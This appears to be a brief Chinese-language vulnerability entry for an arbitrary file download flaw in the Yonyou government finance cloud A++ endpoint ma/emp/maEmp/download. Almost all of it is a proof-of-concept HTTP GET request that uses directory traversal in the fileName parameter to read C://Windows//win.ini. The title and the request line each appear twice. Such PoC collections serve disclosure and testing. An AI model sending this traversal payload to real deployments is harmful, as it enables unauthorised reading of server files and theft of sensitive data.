漏洞描述
用友政务财务云A++ ma/emp/maEmp/download 任意文件下载漏洞
用友政务财务云A++ ma/emp/maEmp/download 任意文件下载漏洞
PoC代码
GET /ma/emp/maEmp/download?fileName=../../../../../../../../../C://Windows//win.ini HTTP/1.1GET /ma/emp/maEmp/download?fileName=../../../../../../../../../C://Windows//win.ini HTTP/1.1